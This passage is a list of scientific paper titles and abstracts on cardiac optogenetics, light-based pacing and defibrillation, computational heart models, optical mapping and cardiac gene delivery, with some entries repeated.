(for a wide range of coupling strengths) and in cardiac syncytium with neonatal rat cardiomyocytes. For the first time, we combined optical excitation and optical imaging to capture light-triggered muscle contractions and high-resolution propagation maps of light-triggered electrical waves, found to be quantitatively indistinguishable from electrically-triggered waves. ::: ::: Conclusions —Our results demonstrate feasibility to control excitation and contraction in cardiac muscle by light using the TCU approach. Optical pacing in this case uses less energy, offers superior spatiotemporal control, remote access and can serve not only as an elegant tool in arrhythmia research, but may form the basis for a new generation of light-driven cardiac pacemakers and muscle actuators. The TCU strategy is extendable to (non-viral) stem cell therapy and is directly relevant to in vivo applications. --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: Optical mapping of optogenetically shaped cardiac action potentials paper_content: Light-mediated silencing and stimulation of cardiac excitability, an important complement to electrical stimulation, promises important discoveries and therapies. To date, cardiac optogenetics has been studied with patch-clamp, multielectrode arrays, video microscopy, and an all-optical system measuring calcium transients. The future lies in achieving simultaneous optical acquisition of excitability signals and optogenetic control, both with high spatio-temporal resolution. Here, we make progress by combining optical mapping of action potentials with concurrent activation of channelrhodopsin-2 (ChR2) or halorhodopsin (eNpHR3.0), via an all-optical system applied to monolayers of neonatal rat ventricular myocytes (NRVM). Additionally, we explore the capability of ChR2 and eNpHR3.0 to shape action-potential waveforms, potentially aiding the study of short/long QT syndromes that result from abnormal changes in action potential duration (APD). These results show the promise of an all-optical system to acquire action potentials with precise temporal optogenetics control, achieving a long-sought flexibility beyond the means of conventional electrical stimulation. --- paper_title: Modulation of cardiac tissue electrophysiological properties with light-sensitive proteins. paper_content: AIMS ::: Optogenetics approaches, utilizing light-sensitive proteins, have emerged as unique experimental paradigms to modulate neuronal excitability. We aimed to evaluate whether a similar strategy could be used to control cardiac-tissue excitability. ::: ::: ::: METHODS AND RESULTS ::: A combined cell and gene therapy strategy was developed in which fibroblasts were transfected to express the light-activated depolarizing channel Channelrhodopsin-2 (ChR2). Patch-clamp studies confirmed the development of a robust inward current in the engineered fibroblasts following monochromatic blue-light exposure. The engineered cells were co-cultured with neonatal rat cardiomyocytes (or human embryonic stem cell-derived cardiomyocytes) and studied using a multielectrode array mapping technique. These studies revealed the ability of the ChR2-fibroblasts to electrically couple and pace the cardiomyocyte cultures at varying frequencies in response to blue-light flashes. Activation mapping pinpointed the source of this electrical activity to the engineered cells. Similarly, diffuse seeding of the ChR2-fibroblasts allowed multisite optogenetics pacing of the co-cultures, significantly shortening their electrical activation time and synchronizing contraction. Next, optogenetics pacing in an in vitro model of conduction block allowed the resynchronization of the tissue's electrical activity. Finally, the ChR2-fibroblasts were transfected to also express the light-sensitive hyperpolarizing proton pump Archaerhodopsin-T (Arch-T). Seeding of the ChR2/ArchT-fibroblasts allowed to either optogentically pace the cultures (in response to blue-light flashes) or completely suppress the cultures' electrical activity (following continuous illumination with 624 nm monochromatic light, activating ArchT). ::: ::: ::: CONCLUSIONS ::: The results of this proof-of-concept study highlight the unique potential of optogenetics for future biological pacemaking and resynchronization therapy applications and for the development of novel anti-arrhythmic strategies. --- paper_title: Optogenetic control of heart muscle in vitro and in vivo paper_content: Stimulation of the light-activated cation channel channelrhodopsin-2 can depolarize heart muscle in vitro and in vivo, resulting in precise localized stimulation and constant prolonged depolarization of genetically targeted cardiomyocytes and cardiac tissue. --- paper_title: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation paper_content: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation --- paper_title: Light-induced termination of spiral wave arrhythmias by optogenetic engineering of atrial cardiomyocytes paper_content: Aims Atrial fibrillation (AF) is the most common cardiac arrhythmia and often involves reentrant electrical activation (e.g. spiral waves). Drug therapy for AF can have serious side effects including proarrhythmia, while electrical shock therapy is associated with discomfort and tissue damage. Hypothetically, forced expression and subsequent activation of light-gated cation channels in cardiomyocytes might deliver a depolarizing force sufficient for defibrillation, thereby circumventing the aforementioned drawbacks. We therefore investigated the feasibility of light-induced spiral wave termination through cardiac optogenetics. ::: ::: Methods and results Neonatal rat atrial cardiomyocyte monolayers were transduced with lentiviral vectors encoding light-activated Ca2+-translocating channelrhodopsin (CatCh; LV.CatCh∼eYFP↑) or eYFP (LV.eYFP↑) as control, and burst-paced to induce spiral waves rotating around functional cores. Effects of CatCh activation on reentry were investigated by optical and multi-electrode array (MEA) mapping. Western blot analyses and immunocytology confirmed transgene expression. Brief blue light pulses (10 ms/470 nm) triggered action potentials only in LV.CatCh∼eYFP↑-transduced cultures, confirming functional CatCh-mediated current. Prolonged light pulses (500 ms) resulted in reentry termination in 100% of LV.CatCh∼eYFP↑-transduced cultures ( n = 31) vs. 0% of LV.eYFP↑-transduced cultures ( n = 11). Here, CatCh activation caused uniform depolarization, thereby decreasing overall excitability (MEA peak-to-peak amplitude decreased 251.3 ± 217.1 vs. 9.2 ± 9.5 μV in controls). Consequently, functional coresize increased and phase singularities (PSs) drifted, leading to reentry termination by PS–PS or PS–boundary collisions. ::: ::: Conclusion This study shows that spiral waves in atrial cardiomyocyte monolayers can be terminated effectively by a light-induced depolarizing current, produced by the arrhythmogenic substrate itself, upon optogenetic engineering. These results provide proof-of-concept for shockless defibrillation. --- paper_title: Optogenetic activation of Gq signalling modulates pacemaker activity of cardiomyocytes paper_content: Aims Investigation of Gq signalling with pharmacological agonists of Gq-coupled receptors lacks spatio-temporal precision. The aim of this study was to establish melanopsin, a light-sensitive Gq-coupled receptor, as a new tool for the investigation of spatial and temporal effects of Gq stimulation on pacemaking in cardiomyocytes at an early developmental stage. ::: ::: Methods and results A vector for ubiquitous expression of melanopsin was tested in HEK293FT cells, which showed light-induced production of inositol-1,4,5-trisphosphate and elevation of intracellular Ca2+ concentration. Mouse embryonic stem cells were stably transfected with this plasmid and differentiated into spontaneously beating embryoid bodies (EBs). Cardiomyocytes within EBs showed melanopsin expression and illumination (60 s, 308.5 nW/mm2, 470 nm) of EBs increased beating rate within 10.2 ± 1.7 s to 317.1 ± 16.3% of baseline frequency. Illumination as short as 5 s was sufficient for generating the maximal frequency response. After termination of illumination, baseline frequency was reached with a decay constant of 27.1 ± 2.5 s. The light-induced acceleration of beating frequency showed a sigmoid dependence on light intensity with a half maximal effective light intensity of 41.7 nW/mm2. Interestingly, EBs showed a high rate of irregular contractions after termination of high-intensity illumination. Local Gq activation by illumination of a small region in a functional syncytium of cardiomyocytes led to pacemaker activity within the illuminated area. ::: ::: Conclusions Light-induced Gq activation in melanopsin-expressing cardiomyocytes increases beating rate and generates local pacemaker activity. We propose that melanopsin is a powerful optogenetic tool for the investigation of spatial and temporal aspects of Gq signalling in cardiovascular research. --- paper_title: Light induced stimulation and delay of cardiac activity. paper_content: This article shows the combination of light activatable ion channels and microelectrode array (MEA) technology for bidirectionally interfacing cells. HL-1 cultures, a mouse derived cardiomyocyte-like cell line, transfected with channelrhodopsin were stimulated with a microscope coupled 473 nm laser and recorded with custom built 64 electrode MEAs. Channelrhodopsin induced depolarization of the cell can evoke action potentials (APs) in single cells. Spreading of the AP over the cell layer can then be measured with good spatiotemporal resolution using MEA recordings. The possibility for light induced pacemaker switching in cultures was shown. Furthermore, the suppression of APs can also be achieved with the laser. Possible applications include cell analysis, e.g. pacemaker interference or induced pacemaker switching, and medical applications such as a combined cardiac pacemaker and defibrillator triggered by light. Since current prosthesis research focuses on bidirectionality, this system may be applied to any electrogenic cell, including neurons or muscles, to advance this field. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodospin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance- dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: Computational models of optogenetic tools for controlling neural circuits with light paper_content: Optogenetics is a new neurotechnology innovation based on the creation of light sensitivity of neurons using gene technologies and remote light activation. Optogenetics allows for the first time straightforward targeted neural stimulation with practically no interference between multiple stimulation points since either light beam can be finely confined or the expression of light sensitive ion channels and pumps can be genetically targeted. Here we present a generalised computational modeling technique for various types of optogenetic mechanisms, which was implemented in the NEURON simulation environment. It was demonstrated on the example of a two classical mechanisms for cells optical activation and silencing: channelrhodopsin-2 (ChR2) and halorhodopsin (NpHR).We theoretically investigate the dynamics of the neural response of a layer 5 cortical pyramidal neuron (L5) to four different types of illuminations: 1) wide-field whole cell illumination 2) wide-field apical dendritic illumination 3) focal somatic illumination and 4) focal axon initial segment (AIS) illumination. We show that whole-cell illumination of halorhodopsin most effectively hyperpolarizes the neuron and is able to silence the cell even when driving input is present. However, when channelrhodopsin-2 and halorhodopsin are concurrently active, the relative location of each illumination determines whether the response is modulated with a balance towards depolarization. The methodology developed in this study will be significant to interpret and design optogenetic experiments and in the field of neuroengineering in general. --- paper_title: Multiscale Computational Models for Optogenetic Control of Cardiac Function paper_content: The ability to stimulate mammalian cells with light has significantly changed our understanding of electrically excitable tissues in health and disease, paving the way toward various novel therapeutic applications. Here, we demonstrate the potential of optogenetic control in cardiac cells using a hybrid experimental/computational technique. Experimentally, we introduced channelrhodopsin-2 into undifferentiated human embryonic stem cells via a lentiviral vector, and sorted and expanded the genetically engineered cells. Via directed differentiation, we created channelrhodopsin-expressing cardiomyocytes, which we subjected to optical stimulation. To quantify the impact of photostimulation, we assessed electrical, biochemical, and mechanical signals using patch-clamping, multielectrode array recordings, and video microscopy. Computationally, we introduced channelrhodopsin-2 into a classic autorhythmic cardiac cell model via an additional photocurrent governed by a light-sensitive gating variable. Upon optical stimulation, the channel opens and allows sodium ions to enter the cell, inducing a fast upstroke of the transmembrane potential. We calibrated the channelrhodopsin-expressing cell model using single action potential readings for different photostimulation amplitudes, pulse widths, and frequencies. To illustrate the potential of the proposed approach, we virtually injected channelrhodopsin-expressing cells into different locations of a human heart, and explored its activation sequences upon optical stimulation. Our experimentally calibrated computational toolbox allows us to virtually probe landscapes of process parameters, and identify optimal photostimulation sequences toward pacing hearts with light. --- paper_title: Cardiac applications of optogenetics. paper_content: In complex multicellular systems, such as the brain or the heart, the ability to selectively perturb and observe the response of individual components at the cellular level and with millisecond resolution in time, is essential for mechanistic understanding of function. Optogenetics uses genetic encoding of light sensitivity (by the expression of microbial opsins) to provide such capabilities for manipulation, recording, and control by light with cell specificity and high spatiotemporal resolution. As an optical approach, it is inherently scalable for remote and parallel interrogation of biological function at the tissue level; with implantable miniaturized devices, the technique is uniquely suitable for in vivo tracking of function, as illustrated by numerous applications in the brain. Its expansion into the cardiac area has been slow. Here, using examples from published research and original data, we focus on optogenetics applications to cardiac electrophysiology, specifically dealing with the ability to manipulate membrane voltage by light with implications for cardiac pacing, cardioversion, cell communication, and arrhythmia research, in general. We discuss gene and cell delivery methods of inscribing light sensitivity in cardiac tissue, functionality of the light-sensitive ion channels within different types of cardiac cells, utility in probing electrical coupling between different cell types, approaches and design solutions to all-optical electrophysiology by the combination of optogenetic sensors and actuators, and specific challenges in moving towards in vivo cardiac optogenetics. --- paper_title: Stimulating Cardiac Muscle by Light: Cardiac Optogenetics by Cell Delivery paper_content: Background —After the recent cloning of light-sensitive ion channels and their expression in mammalian cells, a new field, optogenetics, emerged in neuroscience, allowing for precise perturbations of neural circuits by light. However, functionality of optogenetic tools has not been fully explored outside neuroscience; and a non-viral, non-embryogenesis based strategy for optogenetics has not been shown before. ::: ::: Methods and Results —We demonstrate the utility of optogenetics to cardiac muscle by a tandem cell unit (TCU) strategy, where non-excitable cells carry exogenous light-sensitive ion channels, and when electrically coupled to cardiomyocytes, produce optically-excitable heart tissue. A stable channelrhodopsin2 (ChR2) expressing cell line was developed, characterized and used as a cell delivery system. The TCU strategy was validated in vitro in cell pairs with adult canine myocytes (for a wide range of coupling strengths) and in cardiac syncytium with neonatal rat cardiomyocytes. For the first time, we combined optical excitation and optical imaging to capture light-triggered muscle contractions and high-resolution propagation maps of light-triggered electrical waves, found to be quantitatively indistinguishable from electrically-triggered waves. ::: ::: Conclusions —Our results demonstrate feasibility to control excitation and contraction in cardiac muscle by light using the TCU approach. Optical pacing in this case uses less energy, offers superior spatiotemporal control, remote access and can serve not only as an elegant tool in arrhythmia research, but may form the basis for a new generation of light-driven cardiac pacemakers and muscle actuators. The TCU strategy is extendable to (non-viral) stem cell therapy and is directly relevant to in vivo applications. --- paper_title: Methodology for patient-specific modeling of atrial fibrosis as a substrate for atrial fibrillation. paper_content: Personalized computational cardiac models are emerging as an important tool for studying cardiac arrhythmia mechanisms, and have the potential to become powerful instruments for guiding clinical anti-arrhythmia therapy. In this article, we present the methodology for constructing a patient-specific model of atrial fibrosis as a substrate for atrial fibrillation. The model is constructed from high-resolution late gadolinium-enhanced magnetic resonance imaging (LGE-MRI) images acquired in vivo from a patient suffering from persistent atrial fibrillation, accurately capturing both the patient's atrial geometry and the distribution of the fibrotic regions in the atria. Atrial fiber orientation is estimated using a novel image-based method, and fibrosis is represented in the patient-specific fibrotic regions as incorporating collagenous septa, gap junction remodeling, and myofibroblast proliferation. A proof-of-concept simulation result of reentrant circuits underlying atrial fibrillation in the model of the patient's fibrotic atrium is presented to demonstrate the completion of methodology development. --- paper_title: Mechanistic inquiry into the role of tissue remodeling in fibrotic lesions in human atrial fibrillation. paper_content: Atrial fibrillation (AF), the most common arrhythmia in humans, is initiated when triggered activity from the pulmonary veins propagates into atrial tissue and degrades into reentrant activity. Although experimental and clinical findings show a correlation between atrial fibrosis and AF, the causal relationship between the two remains elusive. This study used an array of 3D computational models with different representations of fibrosis based on a patient-specific atrial geometry with accurate fibrotic distribution to determine the mechanisms by which fibrosis underlies the degradation of a pulmonary vein ectopic beat into AF. Fibrotic lesions in models were represented with combinations of: gap junction remodeling; collagen deposition; and myofibroblast proliferation with electrotonic or paracrine effects on neighboring myocytes. The study found that the occurrence of gap junction remodeling and the subsequent conduction slowing in the fibrotic lesions was a necessary but not sufficient condition for AF development, whereas myofibroblast proliferation and the subsequent electrophysiological effect on neighboring myocytes within the fibrotic lesions was the sufficient condition necessary for reentry formation. Collagen did not alter the arrhythmogenic outcome resulting from the other fibrosis components. Reentrant circuits formed throughout the noncontiguous fibrotic lesions, without anchoring to a specific fibrotic lesion. --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: NOTES ON CONTINUOUS STOCHASTIC PHENOMENA paper_content: The study of stochastic processes has naturally led to the consideration of stochastic phenomena which are distributed in space of two or more dimensions. Such investigations are, for instance, of practical interest in connexion with problems concerning the distribution of soil fertility over a field or the relations between the velocities at different points in a turbulent fluid. A review of such work with many references has recently been given by Ghosh (1949) (see also Matern, 1947). In the present note I consider two problems arising in the twoand three-dimensional cases. --- paper_title: Interactions between cardiac fibrosis spatial pattern and ionic remodeling on electrical wave propagation paper_content: Cardiac fibrosis is an important form of pathological tissue remodeling. Fibrosis can electrically-uncouple neighboring excitable cardiomyocytes thus acting as an obstacle to electrical propagation. In this study, we investigated the effects of fibrosis spatial pattern on electrical propagation in control, decreased maximum sodium conductance, and increased intracellular resistivity conditions. Simulations were performed with a monodomain approach and a realistic canine ionic model. We found that the propagation failure is highly dependent on the spatial pattern of fibrosis for all conditions studied with maximum sensitivity for patterns with combination of small and large clusters. However, the effect is particularly sensitive to reduced sodium current condition where conduction block occurred at lower fibrosis density. --- paper_title: Finding Fluorescent Needles in the Cardiac Haystack: Tracking Human Mesenchymal Stem Cells Labeled with Quantum Dots for Quantitative In Vivo Three-Dimensional Fluorescence Analysis paper_content: Stem cells show promise for repair of damaged cardiac tissue. Little is known with certainty, however, about the distribution of these cells once introduced in vivo. Previous attempts at tracking delivered stem cells have been hampered by the autofluorescence of host tissue and limitations of existing labeling techniques. We have developed a novel loading approach to stably label human mesenchymal stem cells with quantum dot (QD) nanoparticles. We report the optimization and validation of this long-term tracking technique and highlight several important biological applications by delivering labeled cells to the mammalian heart. The bright QD crystals illuminate exogenous stem cells in histologic sections for at least 8 weeks following delivery and permit, for the first time, the complete three-dimensional reconstruction of the locations of all stem cells following injection into the heart. Disclosure of potential conflicts of interest is found at the end of this article. --- paper_title: A single direct injection into the left ventricular wall of an adeno-associated virus 9 (AAV9) vector expressing extracellular superoxide dismutase from the cardiac troponin-T promoter protects mice against myocardial infarction paper_content: BACKGROUND ::: Localized administration of a highly efficient gene delivery system in combination with a cardiac-selective promoter may provide a favorable biosafety profile in clinical applications such as coronary artery bypass graft surgery, where regions of myocardium can be readily injected to protect them against the potential threat of future ischemic events. ::: ::: ::: METHODS ::: Adeno-associated virus (AAV) vectors expressing luciferase or enhanced green fluorescent protein (eGFP) packaged into AAV serotypes 1, 2, 6, 8 and 9 were injected into the left ventricular (LV) wall of adult mice to determine the time course, magnitude and distribution of gene expression. An AAV9 vector expressing extracellular superoxide dismutase (EcSOD) from the cardiac troponin T (cTnT) promoter was then directly injected into the LV wall of adult mice. Myocardial infarction was induced 4 weeks after injection and infarct size was determined by triphenyltetrazolium chloride and phthalo blue staining. ::: ::: ::: RESULTS ::: Serotypes AAV 9, 8, 1 and 6 provided early onset of gene expression in the heart with minimal extra-cardiac gene expression. AAV9 provided the highest magnitude of gene expression. Immunostaining for eGFP showed expression spanning the anterior to posterior walls from the mid ventricle to the apex. A single direct injection of the AAV9 vector bearing EcSOD ( n = 5) decreased the mean infarct size by 50% compared to the eGFP control group (n = 8) (44 ± 7% versus 22 ± 5%; p = 0.04). ::: ::: ::: CONCLUSIONS ::: AAV serotype 9 is highly efficient for cardiac gene delivery, as evidenced by early onset and high-level gene expression. AAV9-mediated, cardiac selective overexpression of EcSOD from the cTnT promoter significantly reduced infarct size in mice. --- paper_title: Robust cardiomyocyte-specific gene expression following systemic injection of AAV: in vivo gene delivery follows a Poisson distribution paper_content: Robust cardiomyocyte-specific gene expression following systemic injection of AAV: in vivo gene delivery follows a Poisson distribution --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: Toward microendoscopy-inspired cardiac optogenetics in vivo: technical overview and perspective paper_content: The ability to perform precise, spatially localized actuation and measurements of electrical activity in the heart is crucial in understanding cardiac electrophysiology and devising new therapeutic solutions for control of cardiac arrhythmias. Current cardiac imaging techniques (i.e. optical mapping) employ voltage- or calcium-sensitive fluorescent dyes to visualize the electrical signal propagation through cardiac syncytium in vitro or in situ with very high-spatiotemporal resolution. The extension of optogenetics into the cardiac field, where cardiac tissue is genetically altered to express light-sensitive ion channels allowing electrical activity to be elicited or suppressed in a precise cell-specific way, has opened the possibility for all-optical interrogation of cardiac electrophysiology. In vivo application of cardiac optogenetics faces multiple challenges and necessitates suitable optical systems employing fiber optics to actuate and sense electrical signals. In this technical perspective, we present a compendium of clinically relevant access routes to different parts of the cardiac electrical conduction system based on currently employed catheter imaging systems and determine the quantitative size constraints for endoscopic cardiac optogenetics. We discuss the relevant technical advancements in microendoscopy, cardiac imaging, and optogenetics and outline the strategies for combining them to create a portable, miniaturized fiber-based system for all-optical interrogation of cardiac electrophysiology in vivo. --- paper_title: Cardiac Electromechanical Models: From Cell to Organ paper_content: The heart is a multiphysics and multiscale system that has driven the development of the most sophisticated mathematical models at the frontiers of computation physiology and medicine. This review focuses on electromechanical (EM) models of the heart from the molecular level of myofilaments to anatomical models of the organ. Because of the coupling in terms of function and emergent behaviors at each level of biological hierarchy, separation of behaviors at a given scale is difficult. Here, a separation is drawn at the cell level so that the first half addresses subcellular/single cell models and the second half addresses organ models. At the subcelluar level, myofilament models represent actin-myosin interaction and Ca-based activation. Myofilament models and their refinements represent an overview of the development in the field. The discussion of specific models emphasizes the roles of cooperative mechanisms and sarcomere length dependence of contraction force, considered the cellular basis of the Frank-Starling law. A model of electrophysiology and Ca handling can be coupled to a myofilament model to produce an EM cell model, and representative examples are summarized to provide an overview of the progression of field. The second half of the review covers organ-level models that require solution of the electrical component as a reaction-diffusion system and the mechanical component, in which active tension generated by the myocytes produces deformation of the organ as described by the equations of continuum mechanics. As outlined in the review, different organ-level models have chosen to use different ionic and myofilament models depending on the specific application; this choice has been largely dictated by compromises between model complexity and computational tractability. The review also addresses application areas of EM models such as cardiac resynchronization therapy and the role of mechano-electric coupling in arrhythmias and defibrillation. --- paper_title: "Beauty is a light in the heart": the transformative potential of optogenetics for clinical applications in cardiovascular medicine. paper_content: Optogenetics is an exciting new technology in which viral gene or cell delivery is used to inscribe light sensitivity in excitable tissue to enable optical control of bioelectric behavior. Initial progress in the fledgling domain of cardiac optogenetics has included in vitro expression of various light-sensitive proteins in cell monolayers and transgenic animals to demonstrate an array of potentially useful applications, including light-based pacing, silencing of spontaneous activity, and spiral wave termination. In parallel to these developments, the cardiac modeling community has developed a versatile computational framework capable of realistically simulating optogenetics in biophysically detailed, patient-specific representations of the human heart, enabling the exploration of potential clinical applications in a predictive virtual platform. Toward the ultimate goal of assessing the feasibility and potential impact of optogenetics-based therapies in cardiovascular medicine, this review provides (1) a detailed synopsis of in vivo, in vitro, and in silico developments in the field and (2) a critical assessment of how existing clinical technology for gene/cell delivery and intra-cardiac illumination could be harnessed to achieve such lofty goals as light-based arrhythmia termination. --- paper_title: Visualizing excitation waves inside cardiac muscle using transillumination. paper_content: Voltage-sensitive fluorescent dyes have become powerful tools for the visualization of excitation propagation in the heart. However, until recently they were used exclusively for surface recordings. Here we demonstrate the possibility of visualizing the electrical activity from inside cardiac muscle via fluorescence measurements in the transillumination mode (in which the light source and photodetector are on opposite sides of the preparation). This mode enables the detection of light escaping from layers deep within the tissue. Experiments were conducted in perfused (8 mm thick) slabs of sheep right ventricular wall stained with the voltage-sensitive dye di-4-ANEPPS. Although the amplitude and signal-to-noise ratio recorded in the transillumination mode were significantly smaller than those recorded in the epi-illumination mode, they were sufficient to reliably determine the activation sequence. Penetration depths (spatial decay constants) derived from measurements of light attenuation in cardiac muscle were 0.8 mm for excitation (520 +/- 30 nm) and 1.3 mm for emission wavelengths (640 +/- 50 nm). Estimates of emitted fluorescence based on these attenuation values in 8-mm-thick tissue suggest that 90% of the transillumination signal originates from a 4-mm-thick layer near the illuminated surface. A 69% fraction of the recorded signal originates from > or =1 mm below the surface. Transillumination recordings may be combined with endocardial and epicardial surface recordings to obtain information about three-dimensional propagation in the thickness of the myocardial wall. We show an example in which transillumination reveals an intramural reentry, undetectable in surface recordings. --- paper_title: 3D multifunctional integumentary membranes for spatiotemporal cardiac measurements and stimulation across the entire epicardium paper_content: Tools for cardiac physiological mapping are important for basic and clinical cardiac research. Here the authors use 3D printing to create a thin, elastic silicone sheath that fits tightly around the entire epicardium and contains sensors to measure a variety of physiological parameters of the beating heart ex vivo. --- paper_title: Quantifying spatial localization of optical mapping using Monte Carlo simulations paper_content: Optical mapping techniques used to study spatial distributions of cardiac activity can be divided into two categories; (1) broad-field excitation method, in which hearts stained with voltage or calcium sensitive dyes are illuminated with broad-field excitation light and fluorescence is collected by image or photodiode arrays; (2) laser scanning method, in which illumination uses a scanning laser and fluorescence is collected with a photomultiplier tube. The spatial localization of the fluorescence signal for these two methods is unknown and may depend upon light absorption and scattering at both excitation and emission wavelengths. We measured the absorption coefficients (/spl mu//sub a/), scattering coefficients (/spl mu//sub s/), and scattering anisotropy coefficients (g) at representative excitation and emission wavelengths in rabbit heart tissue stained with di-4-ANEPPS or co-stained with both Rh237 and Oregon Green 488 BAPTA 1. Monte Carlo models were then used to simulate absorption and scattering of excitation light and fluorescence emission light for both broad-field and laser methods in three-dimensional tissue. Contributions of local emissions throughout the tissue to fluorescence collected from the tissue surface were determined for both methods. Our results show that spatial localization depends on the light absorption and scattering in tissue and on the optical mapping method that is used. A tissue region larger than the laser beam or collecting area of the array element contributes to the optical recordings. --- paper_title: Simulating photon scattering effects in structurally detailed ventricular models using a Monte Carlo approach paper_content: Light scattering during optical imaging of electrical activation within the heart is known to significantly distort the optically-recorded action potential (AP) upstroke, as well as affecting the magnitude of the measured response of ventricular tissue to strong electric shocks. Modelling approaches based on the photon diffusion equation have recently been instrumental in quantifying and helping to understand the origin of the resulting distortion. However, they are unable to faithfully represent regions of non-scattering media, such as small cavities within the myocardium which are filled with perfusate during experiments. Stochastic Monte Carlo (MC) approaches allow simulation and tracking of individual photon `packets' as they propagate through tissue with differing scattering properties. Here, we present a novel application of the MC method of photon scattering simulation, applied for the first time to the simulation of cardiac optical mapping signals within unstructured, tetrahedral, finite element computational ventricular models. The method faithfully allows simulation of optical signals over highly-detailed, anatomically-complex MR-based models, including representations of fine-scale anatomy and intramural cavities. We show that optical action potential upstroke is prolonged close to large subepicardial vessels than further away from vessels, at times having a distinct `humped' morphology. Furthermore, we uncover a novel mechanism by which photon scattering effects around vessels cavities interact with `virtual-electrode' regions of strong de-/hyper-polarised tissue surrounding cavities during shocks, significantly reducing the apparent optically-measured epicardial polarisation. We therefore demonstrate the importance of this novel optical mapping simulation approach along with highly anatomically-detailed models to fully investigate electrophysiological phenomena driven by fine-scale structural heterogeneity. --- paper_title: Synthesis of voltage-sensitive optical signals: application to panoramic optical mapping. paper_content: Fluorescent photon scattering is known to distort optical recordings of cardiac transmembrane potentials; however, this process is not well quantified, hampering interpretation of experimental data. This study presents a novel model, which accurately synthesizes fluorescent recordings over the irregular geometry of the rabbit ventricles. Using the model, the study aims to provide quantification of fluorescent signal distortion for different optical characteristics of the preparation and of the surrounding medium. A bi-domain representation of electrical activity is combined with finite element solutions to the photon diffusion equation simulating both the excitation and emission processes, along with physically realistic boundary conditions at the epicardium, which allow simulation of different experimental setups. We demonstrate that distortion in the optical signal as a result of fluorescent photon scattering is truly a three-dimensional phenomenon and depends critically upon the geometry of the preparation, the scattering properties of the tissue, the direction of wavefront propagation, and the specifics of the experimental setup. Importantly, we show that in an anatomically accurate model of ventricular geometry and fiber orientation, the morphology of the optical signal does not provide reliable information regarding the intramural direction of wavefront propagation. These findings underscore the potential of the new model in interpreting experimental data. --- paper_title: Whole-Heart Modeling: Applications to Cardiac Electrophysiology and Electromechanics paper_content: Recent developments in cardiac simulation have rendered the heart the most highly integrated example of a virtual organ. We are on the brink of a revolution in cardiac research, one in which computational modeling of proteins, cells, tissues, and the organ permit linking genomic and proteomic information to the integrated organ behavior, in the quest for a quantitative understanding of the functioning of the heart in health and disease. The goal of this review is to assess the existing state-of-the-art in whole-heart modeling and the plethora of its applications in cardiac research. General whole-heart modeling approaches are presented, and the applications of whole-heart models in cardiac electrophysiology and electromechanics research are reviewed. The article showcases the contributions that whole-heart modeling and simulation have made to our understanding of the functioning of the heart. A summary of the future developments envisioned for the field of cardiac simulation and modeling is also presented. Biophysically based computational modeling of the heart, applied to human heart physiology and the diagnosis and treatment of cardiac disease, has the potential to dramatically change 21st century cardiac research and the 